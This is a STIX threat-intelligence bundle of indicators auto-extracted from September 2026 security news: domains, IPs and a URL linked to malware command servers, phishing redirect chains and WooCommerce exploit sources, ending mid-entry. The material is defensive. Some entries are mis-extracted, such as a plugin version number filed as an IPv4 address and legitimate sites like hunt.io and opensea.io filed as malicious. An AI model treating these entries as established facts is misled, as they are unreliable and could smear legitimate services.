{"type":"bundle","id":"bundle--78e88885-3952-4e96-b706-21e08783cf03","objects":[{"type":"identity","spec_version":"2.1","id":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","created":"2026-09-15T22:15:20.128Z","modified":"2026-09-15T22:15:20.128Z","name":"ZeroHour","identity_class":"system","description":"Indicators auto-extracted from public security reporting. Verify before use."},{"type":"indicator","spec_version":"2.1","id":"indicator--50bba41a-6d5c-4ffe-8282-ec5f75852125","created":"2026-09-15T19:38:58.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: vip311.cc","description":"Seen in \"Low-quality casino sites conceal highly dangerous threat actors\" (The Register · Security). Context: e. Screenshots of three casino sites identified by Infoblox—vip311[.]cc, zzyud[.]com and zenplay77-x[.]space—with vip311[.]cc ass","pattern":"[domain-name:value = 'vip311.cc']","pattern_type":"stix","valid_from":"2026-09-15T19:38:58.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"The Register · Security","url":"https://www.theregister.com/security/2026/09/15/low-quality-casino-sites-conceal-highly-dangerous-threat-actors/5296652"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b4e38862-15f1-4276-a2b8-7175b446f05f","created":"2026-09-15T19:38:58.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: zenplay77-x.space","description":"Seen in \"Low-quality casino sites conceal highly dangerous threat actors\" (The Register · Security). Context: o sites identified by Infoblox—vip311[.]cc, zzyud[.]com and zenplay77-x[.]space—with vip311[.]cc associated with PeckBirdy. The problem i","pattern":"[domain-name:value = 'zenplay77-x.space']","pattern_type":"stix","valid_from":"2026-09-15T19:38:58.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"The Register · Security","url":"https://www.theregister.com/security/2026/09/15/low-quality-casino-sites-conceal-highly-dangerous-threat-actors/5296652"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--da7829b7-958c-482f-8df0-d35309c043d5","created":"2026-09-15T19:38:58.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: zzyud.com","description":"Seen in \"Low-quality casino sites conceal highly dangerous threat actors\" (The Register · Security). Context: s of three casino sites identified by Infoblox—vip311[.]cc, zzyud[.]com and zenplay77-x[.]space—with vip311[.]cc associated with","pattern":"[domain-name:value = 'zzyud.com']","pattern_type":"stix","valid_from":"2026-09-15T19:38:58.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"The Register · Security","url":"https://www.theregister.com/security/2026/09/15/low-quality-casino-sites-conceal-highly-dangerous-threat-actors/5296652"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--202cb86e-7606-43a0-999c-7fa73437bc1e","created":"2026-09-15T18:54:14.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: luizestrelhashapr.online","description":"Seen in \"KREMLIN Banking Malware Hijacks Chrome and Edge to Steal Credentials and Session Tokens\" (The Hacker News). Context: filtrating browser data for each profile to its C2 server (\"luizestrelhashapr[.]online:443\") but not before requesting extensive access to brows","pattern":"[domain-name:value = 'luizestrelhashapr.online']","pattern_type":"stix","valid_from":"2026-09-15T18:54:14.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/kremlin-banking-malware-hijacks-chrome.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--391050ec-336b-45f6-ae97-c04209d02a85","created":"2026-09-15T18:54:14.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: volmira.site","description":"Seen in \"KREMLIN Banking Malware Hijacks Chrome and Edge to Steal Credentials and Session Tokens\" (The Hacker News). Context: to the same Ethereum smart contract to fetch two domains – volmira[.]site and zaviro[.]online – and queries the former to obtain th","pattern":"[domain-name:value = 'volmira.site']","pattern_type":"stix","valid_from":"2026-09-15T18:54:14.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/kremlin-banking-malware-hijacks-chrome.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--de7fd754-ee24-4ba2-8c6c-2c5111dfdc84","created":"2026-09-15T18:54:14.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: zaviro.online","description":"Seen in \"KREMLIN Banking Malware Hijacks Chrome and Edge to Steal Credentials and Session Tokens\" (The Hacker News). Context: um smart contract to fetch two domains – volmira[.]site and zaviro[.]online – and queries the former to obtain the browser extension","pattern":"[domain-name:value = 'zaviro.online']","pattern_type":"stix","valid_from":"2026-09-15T18:54:14.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/kremlin-banking-malware-hijacks-chrome.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7b106ebf-2300-4f1b-9377-f25682b4f3cd","created":"2026-09-15T15:23:19.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: c2iznja.com","description":"Seen in \"BambooToken Malware Uses MQTT to Control Windows and Linux Systems\" (The Hacker News). Context: on the machine and exfiltrate them to the C2 server (\"api80.c2iznja[.]com\"). \"The domains used Cloudflare as a proxy for their infr","pattern":"[domain-name:value = 'c2iznja.com']","pattern_type":"stix","valid_from":"2026-09-15T15:23:19.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/bambootoken-malware-uses-mqtt-to.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7c19f449-91df-4e51-8a34-dc1900c4cc0b","created":"2026-09-15T15:23:19.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: chat5188.tk","description":"Seen in \"BambooToken Malware Uses MQTT to Control Windows and Linux Systems\" (The Hacker News). Context: gather system details and transmit them to the C2 server (\"chat5188[.]tk\"). In response, the server issues commands to load a plug","pattern":"[domain-name:value = 'chat5188.tk']","pattern_type":"stix","valid_from":"2026-09-15T15:23:19.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/bambootoken-malware-uses-mqtt-to.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7a52dab5-b1c3-4808-a4b3-ec827944ae19","created":"2026-09-15T14:45:10.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"ipv4: 2.0.3.1","description":"Seen in \"Hackers target WordPress sites via third-party WooCommerce plugin\" (BleepingComputer). Context: aw is tracked as CVE-2026-27540 and impacts plugin versions 2.0.3.1 and older. It is an unauthenticated arbitrary file-upload v","pattern":"[ipv4-addr:value = '2.0.3.1']","pattern_type":"stix","valid_from":"2026-09-15T14:45:10.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/hackers-target-wordpress-sites-via-third-party-woocommerce-plugin/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d7da89e4-0910-4140-9de1-0385ff9bccd5","created":"2026-09-15T13:33:58.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: hunt.io","description":"Seen in \"Thai Broadband Provider Hacked via Fortinet Vulnerability\" (SecurityWeek). Context: mand-and-control (C&C) platform for remote administration,” Hunt.io says. Next, the attackers used various scripts for host dis","pattern":"[domain-name:value = 'hunt.io']","pattern_type":"stix","valid_from":"2026-09-15T13:33:58.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"SecurityWeek","url":"https://www.securityweek.com/thai-broadband-provider-hacked-via-fortinet-vulnerability/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--46ad7352-b6fb-4573-ad82-29cb73baa2f8","created":"2026-09-15T13:04:34.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: 31-59-175-195.syd.nbn.aussiebb.net","description":"Seen in \"Phishing Attacks Abuse Trusted Email Infrastructure and URL Cloaking to Evade Security Filters\" (GBHackers). Context: gets through redirect and tracking infrastructure including 31-59-175-195[.]syd[.]nbn[.]aussiebb[.]net , loadswage[.]com , and eightindigostove[.]com . Th","pattern":"[domain-name:value = '31-59-175-195.syd.nbn.aussiebb.net']","pattern_type":"stix","valid_from":"2026-09-15T13:04:34.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/trusted-email-abuse/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2d0c4584-92a3-49ed-b049-14f24922d58f","created":"2026-09-15T13:04:34.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: eightindigostove.com","description":"Seen in \"Phishing Attacks Abuse Trusted Email Infrastructure and URL Cloaking to Evade Security Filters\" (GBHackers). Context: 75-195[.]syd[.]nbn[.]aussiebb[.]net , loadswage[.]com , and eightindigostove[.]com . The final operation was assessed as fake renewal scarew","pattern":"[domain-name:value = 'eightindigostove.com']","pattern_type":"stix","valid_from":"2026-09-15T13:04:34.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/trusted-email-abuse/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--76bc2fa1-1f1c-4b87-9041-db2168be7da7","created":"2026-09-15T13:04:34.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: loadswage.com","description":"Seen in \"Phishing Attacks Abuse Trusted Email Infrastructure and URL Cloaking to Evade Security Filters\" (GBHackers). Context: ture including 31-59-175-195[.]syd[.]nbn[.]aussiebb[.]net , loadswage[.]com , and eightindigostove[.]com . The final operation was as","pattern":"[domain-name:value = 'loadswage.com']","pattern_type":"stix","valid_from":"2026-09-15T13:04:34.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/trusted-email-abuse/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--808ac9b8-c629-4d00-bf95-f730ec506898","created":"2026-09-15T13:04:34.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: moolaah.com","description":"Seen in \"Phishing Attacks Abuse Trusted Email Infrastructure and URL Cloaking to Evade Security Filters\" (GBHackers). Context: d through Amazon Simple Email Service from the DKIM-aligned moolaah[.]com domain and urged recipients to open a supposed Mahnschrei","pattern":"[domain-name:value = 'moolaah.com']","pattern_type":"stix","valid_from":"2026-09-15T13:04:34.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/trusted-email-abuse/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--78f8e854-d053-4c0d-aa7c-54d46c314ac4","created":"2026-09-15T13:04:34.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: opensea.io","description":"Seen in \"Phishing Attacks Abuse Trusted Email Infrastructure and URL Cloaking to Evade Security Filters\" (GBHackers). Context: itting a concealed POST request and eventually resolving to opensea[.]io during live analysis. Virus Bulletin’s Q3 2026 VBSpam tes","pattern":"[domain-name:value = 'opensea.io']","pattern_type":"stix","valid_from":"2026-09-15T13:04:34.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/trusted-email-abuse/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ac493568-96bd-4819-a243-dc6a7dd0ba32","created":"2026-09-15T13:04:34.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: web5-4s4c-online-garantibbva.vibtee.com","description":"Seen in \"Phishing Attacks Abuse Trusted Email Infrastructure and URL Cloaking to Evade Security Filters\" (GBHackers). Context: s IPv4 address 103[.]193[.]179[.]223 and redirected through web5-4s4c-online-garantibbva[.]vibtee[.]com/ro/ before ultimately reaching Google during verificati","pattern":"[domain-name:value = 'web5-4s4c-online-garantibbva.vibtee.com']","pattern_type":"stix","valid_from":"2026-09-15T13:04:34.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/trusted-email-abuse/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e0ccf1fa-5bfd-4d70-b926-ce9693c058da","created":"2026-09-15T13:04:34.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: website-2df62808.mvplineup.com","description":"Seen in \"Phishing Attacks Abuse Trusted Email Infrastructure and URL Cloaking to Evade Security Filters\" (GBHackers). Context: ent reminder. No file was attached. Its embedded URL led to website-2df62808[.]mvplineup[.]com/audacity/underside , a first-stage page containing deco","pattern":"[domain-name:value = 'website-2df62808.mvplineup.com']","pattern_type":"stix","valid_from":"2026-09-15T13:04:34.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/trusted-email-abuse/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--5997b2ff-9842-40f2-bbac-b8458e468f91","created":"2026-09-15T13:04:34.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: xmasbrick.com","description":"Seen in \"Phishing Attacks Abuse Trusted Email Infrastructure and URL Cloaking to Evade Security Filters\" (GBHackers). Context: : Virus Bulletin). Sent from the DKIM-aligned but unrelated xmasbrick[.]com domain, the message embedded an IPv6-mapped address: hxxp","pattern":"[domain-name:value = 'xmasbrick.com']","pattern_type":"stix","valid_from":"2026-09-15T13:04:34.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/trusted-email-abuse/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7be7496d-08ba-4b86-8106-ea9b5f57cb36","created":"2026-09-15T13:04:34.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"url: http://[0000:0000:0000:0000:0000:FFFF:67C1:B3DF","description":"Seen in \"Phishing Attacks Abuse Trusted Email Infrastructure and URL Cloaking to Evade Security Filters\" (GBHackers). Context: [.]com domain, the message embedded an IPv6-mapped address: hxxp://[0000:0000:0000:0000:0000:FFFF:67C1:B3DF]/11881659 . That notation represents IPv4 address 103[.]193","pattern":"[url:value = 'http://[0000:0000:0000:0000:0000:FFFF:67C1:B3DF']","pattern_type":"stix","valid_from":"2026-09-15T13:04:34.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/trusted-email-abuse/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--fb506d37-391c-4ca7-8be4-f41b2b5fc82d","created":"2026-09-15T12:05:55.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"ipv4: 104.194.9.138","description":"Seen in \"Hackers Actively Exploit Critical WooCommerce Plugin Vulnerability to Upload PHP Backdoors\" (GBHackers). Context: 5389::1 4 92.241.13.140 5 23.137.105.214 6 23.180.120.140 7 104.194.9.138 8 187.75.114.36 Note: IP addresses and domains are intentio","pattern":"[ipv4-addr:value = '104.194.9.138']","pattern_type":"stix","valid_from":"2026-09-15T12:05:55.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/woocommerce-plugin-vulnerability/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d5c0471e-d354-4dfc-8747-29ffcace3f23","created":"2026-09-15T12:05:55.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"ipv4: 187.75.114.36","description":"Seen in \"Hackers Actively Exploit Critical WooCommerce Plugin Vulnerability to Upload PHP Backdoors\" (GBHackers). Context: .13.140 5 23.137.105.214 6 23.180.120.140 7 104.194.9.138 8 187.75.114.36 Note: IP addresses and domains are intentionally defanged (","pattern":"[ipv4-addr:value = '187.75.114.36']","pattern_type":"stix","valid_from":"2026-09-15T12:05:55.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/woocommerce-plugin-vulnerability/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--61b6c07d-d055-4985-8eec-a67b797ff9b6","created":"2026-09-15T12:05:55.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"ipv4: 2.0.3.1","description":"Seen in \"Hackers Actively Exploit Critical WooCommerce Plugin Vulnerability to Upload PHP Backdoors\" (GBHackers). Context: bility , tracked as CVE-2026-27540, affects plugin versions 2.0.3.1 and earlier and has received a CVSS severity score of 9.8 o","pattern":"[ipv4-addr:value = '2.0.3.1']","pattern_type":"stix","valid_from":"2026-09-15T12:05:55.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/woocommerce-plugin-vulnerability/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--31bdf5d6-3b20-4108-980f-7253f0326128","created":"2026-09-15T12:05:55.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"ipv4: 23.137.105.214","description":"Seen in \"Hackers Actively Exploit Critical WooCommerce Plugin Vulnerability to Upload PHP Backdoors\" (GBHackers). Context: 3 2 31.59.129.150 3 2a0f:85c1:840:5389::1 4 92.241.13.140 5 23.137.105.214 6 23.180.120.140 7 104.194.9.138 8 187.75.114.36 Note: IP a","pattern":"[ipv4-addr:value = '23.137.105.214']","pattern_type":"stix","valid_from":"2026-09-15T12:05:55.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/woocommerce-plugin-vulnerability/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--fff2d4e2-1e62-4cc4-ba51-3d0b69494819","created":"2026-09-15T12:05:55.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"ipv4: 23.180.120.140","description":"Seen in \"Hackers Actively Exploit Critical WooCommerce Plugin Vulnerability to Upload PHP Backdoors\" (GBHackers). Context: 3 2a0f:85c1:840:5389::1 4 92.241.13.140 5 23.137.105.214 6 23.180.120.140 7 104.194.9.138 8 187.75.114.36 Note: IP addresses and doma","pattern":"[ipv4-addr:value = '23.180.120.140']","pattern_type":"stix","valid_from":"2026-09-15T12:05:55.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/woocommerce-plugin-vulnerability/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--33cb51c5-ca44-4a0f-a325-554ce22afc8b","created":"2026-09-15T12:05:55.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"ipv4: 31.59.129.150","description":"Seen in \"Hackers Actively Exploit Critical WooCommerce Plugin Vulnerability to Upload PHP Backdoors\" (GBHackers). Context: e most active sources reportedly included 92.241.13.213 and 31.59.129.150, each responsible for more than 24,000 blocked requests, fo","pattern":"[ipv4-addr:value = '31.59.129.150']","pattern_type":"stix","valid_from":"2026-09-15T12:05:55.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/woocommerce-plugin-vulnerability/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--4b5cb87d-0f2a-4d72-98bf-44ef75c68046","created":"2026-09-15T12:05:55.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"ipv4: 92.241.13.140","description":"Seen in \"Hackers Actively Exploit Critical WooCommerce Plugin Vulnerability to Upload PHP Backdoors\" (GBHackers). Context: r 1 92.241.13.213 2 31.59.129.150 3 2a0f:85c1:840:5389::1 4 92.241.13.140 5 23.137.105.214 6 23.180.120.140 7 104.194.9.138 8 187.75.","pattern":"[ipv4-addr:value = '92.241.13.140']","pattern_type":"stix","valid_from":"2026-09-15T12:05:55.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/woocommerce-plugin-vulnerability/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--26a4b670-7097-41a5-be86-0dc689e8ceba","created":"2026-09-15T12:05:55.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"ipv4: 92.241.13.213","description":"Seen in \"Hackers Actively Exploit Critical WooCommerce Plugin Vulnerability to Upload PHP Backdoors\" (GBHackers). Context: and August 30. The most active sources reportedly included 92.241.13.213 and 31.59.129.150, each responsible for more than 24,000 bl","pattern":"[ipv4-addr:value = '92.241.13.213']","pattern_type":"stix","valid_from":"2026-09-15T12:05:55.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/woocommerce-plugin-vulnerability/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c6db19ae-d182-4193-9642-921921229a82","created":"2026-09-15T12:02:50.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: 31-59-175-195.syd.nbn.aussiebb.net","description":"Seen in \"New Phishing Attacks Use Trusted Email Infrastructure and URL Cloaking to Bypass Security Tools\" (Cyber Security News). Context: of compromise (IoCs):- Type Indicator Description Hostname 31-59-175-195[.]syd[.]nbn[.]aussiebb[.]net Redirect infrastructure used in the antivirus renew","pattern":"[domain-name:value = '31-59-175-195.syd.nbn.aussiebb.net']","pattern_type":"stix","valid_from":"2026-09-15T12:02:50.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/new-phishing-attacks/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--fe8e3932-1cc2-485c-b030-8f71808e81b9","created":"2026-09-15T12:02:50.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: eightindigostove.com","description":"Seen in \"New Phishing Attacks Use Trusted Email Infrastructure and URL Cloaking to Bypass Security Tools\" (Cyber Security News). Context: ssociated with the antivirus renewal phishing sample Domain eightindigostove[.]com Domain hosting the unsubscribe path in the antivirus rene","pattern":"[domain-name:value = 'eightindigostove.com']","pattern_type":"stix","valid_from":"2026-09-15T12:02:50.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/new-phishing-attacks/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--cbcf9313-9048-4177-b70f-b278196ac245","created":"2026-09-15T12:02:50.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: loadswage.com","description":"Seen in \"New Phishing Attacks Use Trusted Email Infrastructure and URL Cloaking to Bypass Security Tools\" (Cyber Security News). Context: sed in the antivirus renewal scareware phishing flow Domain loadswage[.]com Redirect infrastructure associated with the antivirus ren","pattern":"[domain-name:value = 'loadswage.com']","pattern_type":"stix","valid_from":"2026-09-15T12:02:50.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/new-phishing-attacks/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--6a740dc2-6f2e-4a12-92cd-5a3c05e69f90","created":"2026-09-15T12:02:50.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: moolaah.com","description":"Seen in \"New Phishing Attacks Use Trusted Email Infrastructure and URL Cloaking to Bypass Security Tools\" (Cyber Security News). Context: path in the antivirus renewal phishing sample Sender domain moolaah[.]com DKIM-aligned sender domain used for the cloaked overdue-p","pattern":"[domain-name:value = 'moolaah.com']","pattern_type":"stix","valid_from":"2026-09-15T12:02:50.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/new-phishing-attacks/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--28e9128e-9891-4ce5-bb56-3c21fa47f045","created":"2026-09-15T12:02:50.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: opensea.io","description":"Seen in \"New Phishing Attacks Use Trusted Email Infrastructure and URL Cloaking to Bypass Security Tools\" (Cyber Security News). Context: ing page used in the invoice phishing redirect chain Domain opensea[.]io Final destination reached after the cloaking and browser-","pattern":"[domain-name:value = 'opensea.io']","pattern_type":"stix","valid_from":"2026-09-15T12:02:50.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/new-phishing-attacks/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--bc2e1a53-601b-4ba2-92ef-3e9c17b353a4","created":"2026-09-15T12:02:50.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: web5-4s4c-online-garantibbva.vibtee.com","description":"Seen in \"New Phishing Attacks Use Trusted Email Infrastructure and URL Cloaking to Bypass Security Tools\" (Cyber Security News). Context: Pv4 address represented by the IPv6-mapped URL notation URL web5-4s4c-online-garantibbva[.]vibtee[.]com/ro/ Redirect destination in the Romanian PSD2 banking p","pattern":"[domain-name:value = 'web5-4s4c-online-garantibbva.vibtee.com']","pattern_type":"stix","valid_from":"2026-09-15T12:02:50.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/new-phishing-attacks/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ca98febd-2dd9-44d1-a8bf-9fd4b7b24d66","created":"2026-09-15T12:02:50.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: website-2df62808.mvplineup.com","description":"Seen in \"New Phishing Attacks Use Trusted Email Infrastructure and URL Cloaking to Bypass Security Tools\" (Cyber Security News). Context: omain used for the cloaked overdue-payment invoice lure URL website-2df62808[.]mvplineup[.]com/audacity/underside First-stage cloaking page used in th","pattern":"[domain-name:value = 'website-2df62808.mvplineup.com']","pattern_type":"stix","valid_from":"2026-09-15T12:02:50.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/new-phishing-attacks/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f744cd18-472f-41fa-8e21-239e1e2f4c25","created":"2026-09-15T12:02:50.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: xmasbrick.com","description":"Seen in \"New Phishing Attacks Use Trusted Email Infrastructure and URL Cloaking to Bypass Security Tools\" (Cyber Security News). Context: the cloaking and browser-fingerprinting stage Sender domain xmasbrick[.]com DKIM-aligned but unrelated sender domain used in the Roma","pattern":"[domain-name:value = 'xmasbrick.com']","pattern_type":"stix","valid_from":"2026-09-15T12:02:50.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/new-phishing-attacks/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7a2f0e41-bb88-4205-bdbd-1fdff593cef5","created":"2026-09-15T12:02:50.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"url: http://[0000:0000:0000:0000:0000:FFFF:67C1:B3DF","description":"Seen in \"New Phishing Attacks Use Trusted Email Infrastructure and URL Cloaking to Bypass Security Tools\" (Cyber Security News). Context: nder domain used in the Romanian banking phishing email URL hxxp://[0000:0000:0000:0000:0000:FFFF:67C1:B3DF]/11881659 IPv6-mapped IP-literal URL embedded in the bankin","pattern":"[url:value = 'http://[0000:0000:0000:0000:0000:FFFF:67C1:B3DF']","pattern_type":"stix","valid_from":"2026-09-15T12:02:50.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security 